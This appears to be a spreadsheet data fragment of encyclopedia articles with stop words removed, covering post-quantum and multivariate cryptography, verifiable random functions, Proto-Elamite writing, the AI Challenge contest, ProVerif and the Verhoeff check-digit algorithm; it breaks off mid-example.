william teukolsky, saul vetterling, william flannery, brian (2007). "section 7.1.2.b multiply with carry (mwc)". numerical recipes: scientific computing (3rd ed.). york: cambridge university press. isbn 978-0-521-88068-8.</t>
  </si>
  <si>
    <t>Post-quantum cryptography</t>
  </si>
  <si>
    <t>cryptography, post-quantum cryptography (sometimes referred quantum-proof, quantum-safe quantum-resistant) refers cryptographic algorithms (usually public-key algorithms) thought secure cryptanalytic attack quantum computer. problem currently popular algorithms security relies three hard mathematical problems: integer factorization problem, discrete logarithm problem elliptic-curve discrete logarithm problem. problems could easily solved sufficiently powerful quantum computer running shor's algorithm.even though current, publicly known, experimental quantum computers lack processing power break real cryptographic algorithm, many cryptographers designing algorithms prepare time quantum computing becomes threat. this work gained greater attention academics industry pqcrypto conference series since 2006 recently several workshops quantum safe cryptography hosted european telecommunications standards institute (etsi) institute quantum computing.in contrast threat quantum computing poses current public-key algorithms, current symmetric cryptographic algorithms hash functions considered relatively secure attacks quantum computers. while quantum grover's algorithm speed attacks symmetric ciphers, doubling size effectively block attacks. thus post-quantum symmetric cryptography need differ significantly current symmetric cryptography. algorithms currently post-quantum cryptography research mostly focused different approaches: lattice-based cryptography this approach includes cryptographic systems learning errors, ring learning errors (ring-lwe), ring learning errors exchange ring learning errors signature, older ntru encryption schemes, newer ntru signature bliss signatures. some schemes like ntru encryption studied many years without anyone finding feasible attack. others like ring-lwe algorithms proofs security reduces worst-case problem. post quantum cryptography study group sponsored european commission suggested stehle–steinfeld variant ntru studied standardization rather ntru algorithm. time, ntru still patented. studies indicated ntru secure properties lattice based algorithms. multivariate cryptography this includes cryptographic systems rainbow (unbalanced vinegar) scheme based difficulty solving systems multivariate equations. various attempts build secure multivariate equation encryption schemes failed. however, multivariate signature schemes like rainbow could provide basis quantum secure digital signature. there patent rainbow signature scheme. hash-based cryptography this includes cryptographic systems lamport signatures, merkle signature scheme, xmss, sphincs, wots schemes. hash based digital signatures invented late 1970s ralph merkle studied ever since interesting alternative number-theoretic digital signatures like dsa. their primary drawback hash-based public key, limit number signatures signed using corresponding private keys. this fact reduced interest signatures interest revived desire cryptography resistant attack quantum computers. there appear patents merkle signature scheme exist many non-patented hash functions could used schemes. stateful hash-based signature scheme xmss developed team researchers direction johannes buchmann described 8391. note schemes one-time bounded-time signatures, moni naor moti yung invented uowhf hashing 1989 designed signature based hashing (the naor-yung scheme) unlimited-time (the first signature require trapdoor properties). code-based cryptography this includes cryptographic systems rely error-correcting codes, mceliece niederreiter encryption algorithms related courtois, finiasz sendrier signature scheme. original mceliece signature using random goppa codes withstood scrutiny years. however, many variants mceliece scheme, seek introduce structure code used order reduce size keys, shown insecure. post quantum cryptography study group sponsored european commission recommended mceliece public encryption system candidate long term protection attacks quantum computers. supersingular elliptic curve isogeny cryptography this cryptographic system relies properties supersingular elliptic curves supersingular isogeny graphs create diffie-hellman replacement forward secrecy. this cryptographic system uses well studied mathematics supersingular elliptic curves create diffie-hellman like exchange serve straightforward quantum computing resistant replacement diffie-hellman elliptic curve diffie–hellman exchange methods widespread today. because works much like existing diffie–hellman implementations, offers forward secrecy viewed important prevent mass surveillance governments also protect compromise long term keys failures. 2012, researchers sun, tian wang chinese state integrated service networks xidian university, extended work feo, jao, plut create quantum secure digital signatures based supersingular elliptic curve isogenies. there patents covering cryptographic system. symmetric quantum resistance provided uses sufficiently large sizes, symmetric cryptographic systems like snow already resistant attack quantum computer. further, management systems protocols symmetric cryptography instead public cryptography like kerberos 3gpp mobile network authentication structure also inherently secure attack quantum computer. given widespread deployment world already, researchers recommend expanded kerberos-like symmetric management efficient post quantum cryptography today. security reductions cryptography research, desirable prove equivalence cryptographic algorithm known hard mathematical problem. these proofs often called "security reductions", used demonstrate difficulty cracking encryption algorithm. words, security given cryptographic algorithm reduced security known hard problem. researchers actively looking security reductions prospects post quantum cryptography. current results given here: lattice-based cryptography ring-lwe signature versions ring-lwe security reduction shortest-vector problem (svp) lattice lower bound security. known np-hard. specific ring-lwe systems provable security reductions include variant lyubashevsky's ring-lwe signatures defined paper güneysu, lyubashevsky, pöppelmann. glyph signature scheme variant güneysu, lyubashevsky, pöppelmann (glp) signature takes account research results come publication signature 2012. another ring-lwe signature ring-tesla. there also exists "derandomized variant" lwe, called learning rounding (lwr), yields improved speedup eliminating sampling small errors gaussian-like distribution deterministic errors) bandwidth." while utilizes addition small error conceal lower bits, utilizes rounding purpose. lattice-based cryptography ntru, bliss security ntru encryption scheme bliss signature believed related provably reducible closest vector problem (cvp) lattice. known np-hard. post quantum cryptography study group sponsored european commission suggested stehle–steinfeld variant ntru security reduction studied long term instead original ntru algorithm. multivariate cryptography unbalanced vinegar unbalanced vinegar signature schemes asymmetric cryptographic primitives based multivariate polynomials finite field {\displaystyle \mathbb bulygin, petzoldt buchmann shown reduction generic multivariate quadratic systems np-hard multivariate quadratic equation solving problem. hash-based cryptography merkle signature scheme 2005, luis garcia proved security reduction merkle hash tree signatures security underlying hash function. garcia showed paper computationally one-way hash functions exist merkle hash tree signature provably secure.therefore, used hash function provable reduction security known hard problem would provable security reduction merkle tree signature known hard problem.the post quantum cryptography study group sponsored european commission recommended merkle signature scheme long term security protection quantum computers. code-based cryptography mceliece mceliece encryption system security reduction syndrome decoding problem (sdp). known np-hard post quantum cryptography study group sponsored european commission recommended cryptography long term protection attack quantum computer. code-based cryptography rlce 2016, wang proposed random linear code encryption scheme rlce based mceliece schemes. rlce scheme constructed using linear code reed-solomon code inserting random columns underlying linear code generator matrix. supersingular elliptic curve isogeny cryptography security related problem constructing isogeny supersingular curves number points. recent investigation difficulty problem delfs galbraith indicates problem hard inventors exchange suggest there security reduction known np-hard problem. comparison common characteristic many post-quantum cryptography algorithms require larger sizes commonly used "pre-quantum" public algorithms. there often tradeoffs made size, computational efficiency ciphertext signature size. table lists values different schemes post-quantum security level. practical consideration choice among post-quantum cryptographic algorithms effort required send public keys internet. from point view, ring-lwe, ntru, sidh algorithms provide sizes conveniently 1kb, hash-signature public keys come 5kb, mdpc-based mceliece takes 1kb. hand, rainbow schemes require 125kb goppa-based mceliece requires nearly key. lattice-based cryptography exchange ring-lwe exchange fundamental idea using ring exchange proposed filed university cincinnati 2011 jintai ding. basic idea comes associativity matrix multiplications, errors used provide security. paper appeared 2012 provisional patent application filed 2012. 2014, peikert presented transport scheme following basic idea ding's, idea sending additional signal rounding ding's construction also utilized. somewhat greater bits security, singh presents parameters 6956-bit public keys peikert's scheme. corresponding private would roughly 14,000 bits. 2015, authenticated exchange provable forward security following basic idea ding's presented eurocrypt 2015, extension hmqv construction crypto2005. parameters different security levels bits bits, along corresponding sizes provided paper. lattice-based cryptography ntru encryption bits security ntru, hirschhorn, hoffstein, howgrave-graham whyte, recommend using public represented degree polynomial coefficients {\displaystyle {\bmod {\left(2^{10}\right)}}} this results public 6130 bits. corresponding private would 6743 bits. multivariate cryptography rainbow signature bits security smallest signature size rainbow multivariate quadratic equation signature scheme, petzoldt, bulygin buchmann, recommend using equations {\displaystyle \mathbb _{31}} public size 991,000 bits, private 740,000 bits digital signatures bits length. hash-based cryptography merkle signature scheme order bits security hash based signatures sign million messages using fractal merkle tree method naor shenhav wool public private sizes roughly 36,000 bits length. code-based cryptography mceliece bits security mceliece scheme, european commissions post quantum cryptography study group recommends using binary goppa code length least 6960 {\displaystyle n=6960} dimension least 5413 {\displaystyle k=5413} capable correcting {\displaystyle t=119} errors. with parameters public mceliece system systematic generator matrix whose non-identity part takes 8373911 {\displaystyle k\times (n-k)=8373911} bits. corresponding private key, consists code support 6960 {\displaystyle n=6960} elements {\displaystyle gf(2^{13})} generator polynomial {\displaystyle t=119} coefficients {\displaystyle gf(2^{13})} 92,027 bits lengththe group also investigating quasi-cyclic mdpc codes length least 65542 {\displaystyle n=2^{16}+6=65542} dimension least 32771 {\displaystyle k=2^{15}+3=32771} capable correcting {\displaystyle t=264} errors. with parameters public mceliece system first systematic generator matrix whose non-identity part takes 32771 {\displaystyle k=32771} bits. private key, quasi-cyclic parity-check matrix {\displaystyle d=274} nonzero entries column twice much row), takes 4384 {\displaystyle d\times 16=4384} bits represented coordinates nonzero entries first row. barreto recommend using binary goppa code length least 3307 {\displaystyle n=3307} dimension least 2515 {\displaystyle k=2515} capable correcting {\displaystyle t=66} errors. with parameters public mceliece system systematic generator matrix whose non-identity part takes 1991880 {\displaystyle k\times (n-k)=1991880} bits. corresponding private key, consists code support 3307 {\displaystyle n=3307} elements {\displaystyle gf(2^{12})} generator polynomial {\displaystyle t=66} coefficients {\displaystyle gf(2^{12})} 40,476 bits length. supersingular elliptic curve isogeny cryptography bits security supersingular isogeny diffie-hellman (sidh) method, feo, plut recommend using supersingular curve modulo 768-bit prime. uses elliptic curve point compression public need 8x768 6144 bits length. march 2016 paper authors azarderakhsh, jao, kalach, koziel, leonardi showed number bits transmitted half, improved authors costello, jao, longa, naehrig, renes urbanik resulting compressed-key version sidh protocol public keys 2640 bits size. this makes number bits transmitted roughly equivalent non-quantum secure diffie-hellman classical security level. symmetric–key-based cryptography general rule, bits security symmetric-key-based system, safely sizes bits. best quantum attack generic symmetric-key systems application grover's algorithm, requires work proportional square root size space. transmit encrypted device possesses symmetric necessary decrypt requires roughly bits well. clear symmetric-key systems offer smallest sizes post-quantum cryptography. forward secrecy public-key system demonstrates property referred perfect forward secrecy generates random public keys session purposes agreement. this means compromise message cannot lead compromise others, also single secret value lead compromise multiple messages. security experts recommend using cryptographic algorithms support forward secrecy not. reason forward secrecy protect compromise long term private keys associated public/private pairs. this viewed means preventing mass surveillance intelligence agencies. both ring-lwe exchange supersingular isogeny diffie-hellman (sidh) exchange support forward secrecy exchange party. both ring-lwe sidh also used without forward secrecy creating variant classic elgamal encryption variant diffie-hellman. algorithms article, ntru, support forward secrecy authenticated public encryption system used build exchange forward secrecy. open quantum safe project open quantum safe (oqs) project started late 2016 goal developing prototyping quantum-resistant cryptography. aims integrate current post-quantum schemes library: liboqs. liboqs open source library quantum-resistant cryptographic algorithms. initially focuses exchange algorithms. provides common suitable post-quantum exchange algorithms, collect together various implementations. liboqs also include test harness benchmarking routines compare performance post-quantum implementations. furthermore, also provides integration liboqs openssl.as april 2017, following exchange algorithms supported: implementation main challenges post-quantum cryptography considered implementation potentially quantum safe algorithms existing systems. there tests done, example microsoft research implementing picnic using hardware security modules. test implementations google's newhope algorithm also done vendors. also nist post-quantum cryptography standardization quantum cryptography cryptography based quantum mechanics references further reading post-quantum cryptography. springer. 2008. 245. isbn 978-3-540-88701-0. isogenies quantum world ideal lattices learning with errors over rings kerberos revisited: quantum-safe authentication picnic signature scheme external links pqcrypto, post-quantum cryptography conference etsi quantum secure standards effort nist's post-quantum crypto project pqcrypto usage deployment</t>
  </si>
  <si>
    <t>Multivariate cryptography</t>
  </si>
  <si>
    <t>multivariate cryptography generic term asymmetric cryptographic primitives based multivariate polynomials finite field {\displaystyle certain cases polynomials could defined ground extension field. polynomials degree two, talk multivariate quadratics. solving systems multivariate polynomial equations proven np-complete. that's schemes often considered good candidates post-quantum cryptography. multivariate cryptography productive terms design cryptanalysis. overall, situation stable strongest schemes withstood test time. commonly admitted multivariate cryptography turned successful approach build signature schemes primarily multivariate schemes provide shortest signature among post-quantum algorithms. history tsutomu matsumoto hideki imai (1988) presented so-called scheme eurocrypt conference. although broken jacques patarin (1995), general principle matsumoto imai inspired generation improved proposals. later work, "hidden monomial cryptosystems" developed french) jacques patarin. based ground extension field. "hidden field equations" (hfe), developed patarin 1996, remains popular multivariate scheme today [p96]. security thoroughly investigated, beginning direct gröbner basis attack [fj03, gjs06], key-recovery attacks (kipnis shamir 1999) [bfp13], more. plain version considered practically broken, sense secure parameters lead impractical scheme. however, simple variants hfe, minus variant vinegar variant allow strengthen basic known attacks. addition hfe, patarin developed schemes. 1997 presented “balanced vinegar” 1999 “unbalanced vinegar”, cooperation aviad kipnis louis goubin (kipnis, patarin goubin 1995). construction multivariate quadratics involves public private key. private consists affine transformations, easy invert quadratic {\displaystyle p'\colon f^{m}\rightarrow f^{n}} denote {\displaystyle n\times matrix affine endomorphisms {\displaystyle s\colon f^{n}\rightarrow f^{n}} {\displaystyle m_{s}} shift vector {\displaystyle v_{s}\in f^{n}} similarly {\displaystyle t\colon f^{m}\rightarrow f^{m}} words, {\displaystyle s(x)=m_{s}x+v_{s}} {\displaystyle t(y)=m_{t}y'+v_{t}} .the triple {\displaystyle (s^{-1},{p'}^{-1},t^{-1})} private key, also known trapdoor. public composition {\displaystyle p=s\circ p'\circ assumption hard invert without knowledge trapdoor. signature signatures generated using private verified using public follows. message hashed vector {\displaystyle y\in f^{n}} known hash function. signature {\displaystyle x=p^{-1}(y)=t^{-1}\left({p'}^{-1}\left(s^{-1}(y)\right)\right)} .the receiver signed document must public possession. computes hash {\displaystyle checks signature {\displaystyle fulfils {\displaystyle p(x)=y} applications unbalanced vinegar hidden field equations sflash nessie rainbow quartz quad (cipher) four multivariate cryptography signature schemes (gemms, luov, rainbow mqdss) made round nist post-quantum competition: slide report. references [bfp13] bettale, jean-charles faugère, perret, cryptanalysis hfe, multi-hfe variants even characteristic. dcc'13 [fj03] jean-charles faugère joux, algebraic cryptanalysis hidden field equation (hfe) cryptosystems using gröbner bases. crypto'03 [gjs06] granboulan, antoine joux, stern: inverting quasipolynomial. crypto'06. kipnis, aviad; patarin, jacques; goubin, louis (1999). "unbalanced vinegar signature schemes". advances cryptology eurocrypt '99. berlin, heidelberg: springer. doi:10.1007/3-540-48910-x_15. isbn 978-3-540-65889-4. issn 0302-9743. 1717470. kipnis, aviad; shamir, (1999). "cryptanalysis public cryptosystem relinearization". advances cryptology crypto' berlin, heidelberg: springer. doi:10.1007/3-540-48405-1_2. isbn 978-3-540-66347-8. issn 0302-9743. 1729291. matsumoto, tsutomu; imai, hideki (1988). "public quadratic polynomial-tuples efficient signature-verification message-encryption". lecture notes computer science. berlin, heidelberg: springer. doi:10.1007/3-540-45961-8_39. isbn 978-3-540-50251-7. issn 0302-9743. 0994679. patarin, jacques (1995). "cryptanalysis matsumoto imai public scheme eurocrypt'88". advances cryptology crypt0' lecture notes computer science. vol. 963. berlin, heidelberg: springer. 248–261. doi:10.1007/3-540-44750-4_20. isbn 978-3-540-60221-7. issn 0302-9743. 1445572. [p96] jacques patarin, hidden field equations (hfe) isomorphisms polynomials (ip): families asymmetric algorithms (extended version); eurocrypt christopher wolf bart preneel, taxonomy public schemes based problem multivariate quadratic equations; current version: 2005-12-15 braeken, christopher wolf, bart preneel, study security unbalanced vinegar signature schemes, current version: 2005-08-06 jintai ding, research project: cryptanalysis rainbow multivariate public signature scheme jacques patarin, nicolas courtois, louis goubin, sflash, fast asymmetric signature scheme low-cost smartcards. primitive specification supporting documentation. bo-yin yang, chen-mou cheng, bor-rong chen, jiun-ming chen, implementing minimized multivariate low-resource embedded systems, 2006 bo-yin yang, jiun-ming chen, yen-hung chen, tts: high-speed signatures low-cost smart card, 2004 nicolas courtois, short signatures, provable security, generic attacks computational security multivariate polynomial schemes hfe, quartz sflash, 2005 alfred menezes, paul oorschot, scott vanstone, handbook applied cryptography, 1997 external links public encryption signature hfeboost</t>
  </si>
  <si>
    <t>Verifiable random function</t>
  </si>
  <si>
    <t>cryptography, verifiable random function (vrf) public-key pseudorandom function provides proofs outputs calculated correctly. owner secret compute function value well associated proof input value. everyone else, using proof associated public verification key), check value indeed calculated correctly, information cannot used find secret key.a verifiable random function viewed public-key analogue keyed cryptographic hash cryptographic commitment exponentially large number seemingly random bits. concept verifiable random function closely related verifiable unpredictable function (vuf), whose outputs hard predict necessarily seem random.the concept introduced micali, rabin, vadhan 1999. since then, verifiable random functions found widespread cryptocurrencies, well proposals protocol design cybersecurity. constructions 1999, micali, rabin, vadhan introduced concept proposed first one. original construction rather inefficient: first produces verifiable unpredictable function, uses hard-core transform vrf; moreover, inputs mapped primes complicated manner: namely, using prime sequence generator generates primes overwhelming probability using probabilistic primality test. verifiable unpredictable function thus proposed, provably secure variant problem hard, defined follows: public {\displaystyle (m,r,q,coins)} product random primes, number randomly selected {\displaystyle \mathbb _{r}^{*}} coins randomly selected bits, function selected randomly polynomials degree {\displaystyle 2k^{2}-1} field {\displaystyle gf(2^{k})} secret {\displaystyle (pk,\phi (m))} given input secret uses prime sequence generator pick corresponding prime {\displaystyle p_{x}} (the generator requires auxiliary inputs coins), computes outputs {\displaystyle r^{1/p_{x}}{\pmod {m}}} easily done knowledge {\displaystyle \phi (m)} 2005, efficient practical verifiable random function proposed dodis yampolskiy. when input {\displaystyle small domain (the authors extend larger domain), function defined follows: {\displaystyle f_{sk}(x)=e(g,g)^{1/(x+sk)}\quad {\mbox{and}}\quad p_{sk}(x)=g^{1/(x+sk)},} e(·,·) bilinear map. verify whether {\displaystyle f_{sk}(x)} computed correctly not, check {\displaystyle e(g^{x}pk,p_{sk}(x))=e(g,g)} {\displaystyle e(g,p_{sk}(x))=f_{sk}(x)} extend larger domain, authors tree construction universal hash function. this secure hard break "q-diffie-helman inversion assumption", states algorithm given {\displaystyle (g,g^{x},\dots ,g^{x^{q}})} compute {\displaystyle g^{1/x}} "q-decisional bilinear diffie-helman inversion assumption", states impossible efficient algorithm given {\displaystyle (g,g^{x},\ldots ,g^{(x^{q})},r)} input distinguish {\displaystyle r=e(g,g)^{1/x}} random, group {\displaystyle \mathbb 2015, hofheinz jager constructed provably secure given member 1)-linear assumption family", includes decision linear assumption. this first constructed depend "q-type complexity assumption".in 2019, bitansky showed vrfs exist non-interactive witness-indistinguishable proofs (that weaker versions non-interactive zero-knowledge proofs problems hide witness prover uses), non-interactive cryptographic commitments, single-key constrained pseudorandom functions (that pseudorandom functions allow user evaluate function preset constrained subset possible inputs) also do.in 2020, esgin proposed post-quantum secure based lattice-based cryptography. uses applications vrfs provide deterministic pre-commitments entropy inputs must resistant brute-force pre-image attacks. vrfs used defense offline enumeration attacks (such dictionary attacks) data stored hash-based data structures. protocol design vrfs used make: resettable zero-knowledge proofs (i.e. remains zero-knowledge even malicious verifier allowed reset honest prover query again) three rounds bare model non-interactive lottery systems verifiable transaction escrow schemes updatable zero-knowledge databases e-cashvrfs also used implement random oracles. internet security dnssec system prevents attackers tampering domain name system messages, also suffers vulnerability zone enumeration. proposed nsec5 system, uses vrfs, provably prevents type attack. cryptocurrency cardano polkadot implement vrfs block production.the internet computer cryptocurrency uses produce decentralized random beacon whose output unpredictable anyone become available everyone. more precisely, protocol allows clients agree (i.e. commitment deterministic pseudorandom sequence) produce output thereof every round using threshold signatures distributed generation.algorand uses vrfs perform cryptographic sortition. platform, every block produces random selection seed, user secretly checks whether selected participate consensus protocol evaluating secret participation selection seed. (this also produces proof, user send anyone show selected participate.) thusly, accounts selected propose blocks given round. manner, vrfs prevent users gaining staking advantages registering multiple accounts. particular algorand uses based elliptic-curve cryptography, specifically curve25519; proposed sharon goldberg, moni naor, dimitris papadopoulos, leonid reyzin, včelák, function currently undergoing standardization ietf internet draft. algorand's implementation function open-source since october 2018.vrfs based elliptic curve cryptography implemented programming language solidity.in 2020, chainlink announced launched chainlink vrf, service uses verifiable random functions generate verifiable randomness on-chain. chainlink vrf, smart contract supplies seed (which unpredictable oracles provided), seed turn used generate random number sent back contract; published on-chain along proof verified using oracle's public application's seed. each oracle, generating randomness, uses secret key.in july 2021, harmony, cryptocurrency project bridges blockchains, oraichain, cryptocurrency project involving artificial intelligence, announced introduced vrfs.in february 2022, switchboard, decentralized oracle protocol, announced first verifiable random function (vrf) solana blockchain. switchboard inspired modelled algorand's vrf. references</t>
  </si>
  <si>
    <t>Proto-Elamite</t>
  </si>
  <si>
    <t>proto-elamite period, also known susa iii, chronological ancient history area elam, dating 3200 2700 archaeological terms corresponds late banesh period. proto-elamite sites recognized oldest civilization territory present-day iran. proto-elamite script early bronze writing system briefly introduction elamite cuneiform. history background during period 8000–3700 fertile crescent witnessed spread small settlements supported agricultural surplus. geometric tokens emerged used manage stewardship surplus. earliest tokens known sites zagros region iran: tepe asiab ganj-i-dareh tepe.the mesopotamian civilization emerged period 3700–2900 amid development technological innovations plough, sailing boats, copper metal working. clay tablets pictographic characters appeared period record commercial transactions performed temples. proto-elamite sites important proto-elamite sites susa anshan. another important site tepe sialk, remaining proto-elamite ziggurat still seen. texts undeciphered proto-elamite script found susa dated period. originally assumed proto-elamites fact elamites (elamite speakers), cultural similarities (for example, building ziggurats), large-scale migration area seems occurred proto-elamite period later elamites. proto-elamite writing found wider area less certain. proto-elamite pottery dating back last half millennium found tepe sialk, proto-elamite writing, first form writing iran, found tablets date. first cylinder seals come proto-elamite period, well.some anthropologists, john alden, maintain proto-elamite influence grew rapidly millennium declined equally rapidly establishment maritime trade persian gulf several centuries later. proto-elamite script proto-elamite signs seem either loans slightly older proto-cuneiform (late uruk) tablets mesopotamia, perhaps likely, share common origin earliest millennium numeral tablets: systems share common signs, particularly related numerals objects counted (such slaves, females, pots...). otherwise, scripts quite different, using entirely different signs. writing style also different: whereas proto-cuneiform written visual hierarchies (boxes), proto-elamite written in-line style. proto-elamite numerical signs follow objects count; non-numerical signs 'images' objects represent, although majority entirely abstract. basic numerical tablets pictorials objects counted (numerical tablets numero-logogramatic tablets) carbon dated 3500-3000 bce, sites godin tepe, habuba kabira, jebel aruda, tell brak tepe hissar. these early numerical tablets similar found mesopotamia. proper proto-elamite used soon after, brief period 3300 3000 (circa jemdet nasr period mesopotamia).linear elamite attested much later last quarter millennium bce. uncertain whether proto-elamite script direct predecessor linear elamite. both scripts remain largely undeciphered, mere speculation postulate relationship two. proponents elamo-dravidian relationship looked similarities proto-elamite script indus script.early similarities noted proto-elamite cretan linear script. inscription corpus proto-elamite writing system used large geographical area, stretching susa west, tepe yahya east, perhaps beyond. known corpus inscriptions consists 1600 tablets, vast majority unearthed susa. proto-elamite tablets found following sites order number tablets recovered): susa (more 1500 tablets) anshan, malyan (more tablets) tepe yahya tablets) tepe sialk tablets) tape sofalin tablets fragments jiroft (two tablets) ozbaki (one tablet) shahr-e sukhteh (one tablet)none inscribed objects ghazir, chogha mish hissar verified proto-elamite; tablets ghazir choga mish uruk style numerical tablets, whereas hissar object cannot classified present. majority tepe sialk tablets also proto-elamite, strictly speaking, belong period close contact mesopotamia iran, presumably corresponding uruk decipherment attempts 2020, françois desset, laboratoire archéorient (lyon, france), announced proposed decipherment translation proto-elamite texts. scholarly paper published proposal.although decipherment proto-elamite remains uncertain, content many texts known. this possible certain signs, particular majority numerical signs, similar neighboring mesopotamian writing system, proto-cuneiform. addition, number proto-elamite signs actual images objects represent. however, majority proto-elamite signs entirely abstract, meanings deciphered careful graphotactical analysis.while elamite language suggested likely candidate underlying proto-elamite inscriptions, positive evidence this. earliest proto-elamite inscriptions, purely ideographical, fact contain linguistic information, following friberg's 1978/79 study ancient near eastern metrology, decipherment attempts moved away linguistic methods. 2012, jacob dahl faculty oriental studies, university oxford, announced project make high-quality images proto-elamite clay tablets publish online. hope crowdsourcing academics amateurs working together would able understand script, despite presence mistakes lack phonetic clues. dahl assisted making images nearly 1600 proto-elamite tablets online. proto-elamite cylinder seals proto-elamite seals follow seals uruk period, share many stylistic elements, display individuality lively rendering. also history iran jiroft culture references literature logan born al., "compositionality complex graphemes undeciphered proto-elamite script using image text embedding models"[3] findings association computational linguistics: acl-ijcnlp 2021, 3136–3146 august 2021 jacob dahl, "complex graphemes proto-elamite," cuneiform digital library journal (cdlj) 2005:3. download copy jacob dahl, "the proto-elamite seal fig. 198", cuneiform digital library notes, cdln 2014:1, 2014 jacob dahl, "new joins louvre proto-elamite tablet collection", cuneiform digital library notes, cdln 2012:6, 2012 dahl, jacob "animal husbandry susa proto-elamite period" smea, vol.47, 81–134, 2005 peter damerow, “the origins writing problem historical epistemology,” cuneiform digital library journal (cdlj) 2006:1. download copy peter damerow robert englund, proto-elamite texts tepe yahya, american school prehistoric research bulletin cambridge, 1989 englund, r.k, "the proto-elamite script," peter daniels william bright, eds. world's writing systems (1996). york/oxford, 160–164, 1996 robert dyson, “early work acropolis susa. beginning prehistory iraq iran,” expedition 10/4 (1968) 21–34. jöran friberg, third millennium roots babylonian mathematics i-ii (göteborg, 1978/79). laura hawkins, edition proto-elamite text 17", cuneiform digital library journal, cdlj 2015:001, 2015 brun, “recherches stratigraphiques l’acropole suse, 1969-1971,” cahiers délégation archaéologique française iran cahdafi paris, 1971) 216. piero meriggi, scritura proto-elamica. parte scritura contenuto testi (rome, 1971). piero meriggi, scritura proto-elamica. parte iia: catalogo segni (rome, 1974). piero meriggi, scritura proto-elamica. parte iiia: testi (rome, 1974). daniel potts, archaeology elam (cambridge, 1999). saeedi, sepideh, proto-elamite communities magnifying glass [8], abar, aydin (hrsg.): pearls, politics pistachios: essays anthropology memories occasion susan pollock's 65th birthday, heidelberg: propylaeum, 2021, 61–87. francois vallat, most ancient scripts iran: current situation, world archaeology, vol. early writing systems, 335–347, (feb., 1986) external links interview francois desset proposed decipherment postil magazine 2021 cuneiform digital library initiative cuneiform digital library initiative proto-elamite cdliwiki university oxford hosted cuneiform digital library initiative graphic, article, proto-elamite tablet bronze age: southeastern iran, western central asia, indus valley, exhibition catalog metropolitan museum (fully available online pdf), contains material proto-elamite culture preliminary proposal encode protoelamite unicode anshuman pandey 2020</t>
  </si>
  <si>
    <t>AI Challenge</t>
  </si>
  <si>
    <t>challenge international artificial intelligence programming contest started university waterloo computer science club. initially contest university waterloo students only. 2010, contest gained sponsorship google allowed extend international students general public. description each participant wrote self-contained computer program play game versus opponent, uploaded source code server. contest engine used trueskill ranking algorithm matchmaking generate rankings. after match, spectators could watch match using browser. contest open source. contestants welcomed improve contest back-end. winners also list computer science awards references external links challenge past tron (winter 2010) challenge university waterloo computer science club</t>
  </si>
  <si>
    <t>ProVerif</t>
  </si>
  <si>
    <t>proverif software tool automated reasoning security properties found cryptographic protocols. tool developed bruno blanchet. support provided cryptographic primitives including: symmetric asymmetric cryptography; digital signatures; hash functions; bit-commitment; signature proofs knowledge. tool capable evaluating reachability properties, correspondence assertions observational equivalence. these reasoning capabilities particularly useful computer security domain since permit analysis secrecy authentication properties. emerging properties privacy, traceability verifiability also considered. protocol analysis considered respect unbounded number sessions unbounded message space. tool capable attack reconstruction: property cannot proved, execution trace falsifies desired property constructed. applicability proverif proverif used following case studies, include security analysis actual network protocols: abadi blanchet used correspondence assertions verify certified email protocol. abadi, blanchet fournet analyse just fast keying protocol, candidates replace internet exchange (ike) exchange protocol ipsec, combining manual proofs proverif proofs correspondence equivalence. blanchet chaudhuri studied integrity plutus file system untrusted storage, using correspondence assertions, resulting discovery, subsequent fixing, weaknesses initial system. bhargavan proverif analyse cryptographic protocol implementations written sharp (programming language); particular transport layer security (tls) protocol studied manner. chen ryan evaluated authentication protocols found trusted platform module (tpm), widely deployed hardware chip, discovered vulnerabilities. delaune, kremer ryan backes, hritcu maffei formalise analyse privacy properties electronic voting using observational equivalence. delaune, ryan smyth backes, maffei unruh analyse anonymity properties trusted computing scheme direct anonymous attestation (daa) using observational equivalence. kusters truderung examine protocols diffie-hellman exponentiation xor. smyth, ryan, kremer kourjieh formalise analyse verifiability properties electronic voting using reachability. google verified transport layer protocol alts. sardar verified remote attestation protocols intel sgx.further examples found online: [1]. alternatives alternative analysis tools include: avispa (for reachability correspondence assertions), kiss (for static equivalence), yapa (for static equivalence). cryptoverif verification security polynomial time adversaries computational model. tamarin prover modern alternative proverif, excellent support diffie-hellman equational reasoning, verification observational equivalence properties. references external links official website</t>
  </si>
  <si>
    <t>Verhoeff algorithm</t>
  </si>
  <si>
    <t>verhoeff algorithm checksum formula error detection developed dutch mathematician jacobus verhoeff first published 1969. first decimal check digit algorithm detects single-digit errors, transposition errors involving adjacent digits, time thought impossible code. goals verhoeff goal finding decimal code—one check digit single decimal digit—which detected single-digit errors transpositions adjacent digits. time, supposed proofs nonexistence codes made base-11 codes popular, example isbn check digit. goals also practical, based evaluation different codes live data dutch postal system, using weighted points system different kinds error. analysis broke errors number categories: first, many digits error; digits error, transpositions ba), twins 'bb'), jump transpositions (abc cba), phonetic a0), jump twins (aba cbc). additionally omitted added digits. although frequencies kinds errors might small, codes might immune addition primary goals detecting singles transpositions. phonetic errors particular showed linguistic effects, dutch, numbers typically read pairs; also sounds similar dutch, sound like taking six-digit numbers example, verhoeff reported following classification errors:. description general idea algorithm represent digits elements dihedral group {\displaystyle d_{5}} that digits {\displaystyle d_{5}} manipulate these, back digits. mapping {\displaystyle m:[0,9]\to d_{5}} {\displaystyle m={\begin{pmatrix}0&amp;1&amp;2&amp;3&amp;4&amp;5&amp;6&amp;7&amp;8&amp;9\\e&amp;r&amp;r^{2}&amp;r^{3}&amp;r^{4}&amp;s&amp;rs&amp;r^{2}s&amp;r^{3}s&amp;r^{4}s\end{pmatrix}}} digit {\displaystyle a_{n}} number digits {\displaystyle example given code {\displaystyle {\displaystyle a_{3}=m(8)=r^{3}s} define permutation {\displaystyle f:d_{5}\to d_{5}} {\displaystyle f={\begin{pmatrix}e&amp;r&amp;r^{2}&amp;r^{3}&amp;r^{4}&amp;s&amp;rs&amp;r^{2}s&amp;r^{3}s&amp;r^{4}s\\r&amp;s&amp;r^{2}s&amp;rs&amp;r^{2}&amp;r^{3}s&amp;r^{3}&amp;e&amp;r^{4}s&amp;r^{4}\end{pmatrix}}} example {\displaystyle f(r^{3})=rs} another example {\displaystyle f^{2}(r^{3})=r^{3}} since {\displaystyle f(f(r^{3}))=f(rs)=r^{3}} using multiplicative notation group operation {\displaystyle d_{5}} check digit simply value {\displaystyle {\displaystyle f(a_{1})\cdot f^{2}(a_{2})\cdot \ldots \cdot f^{k}(a_{n})\cdot f^{k+1}(c)=e} {\displaystyle explicitly given inverse permutation {\displaystyle c=f^{1-k}\left(\prod _{n=1}^{k}f^{n}(a_{n})^{-1}\right)} example check digit verify this, 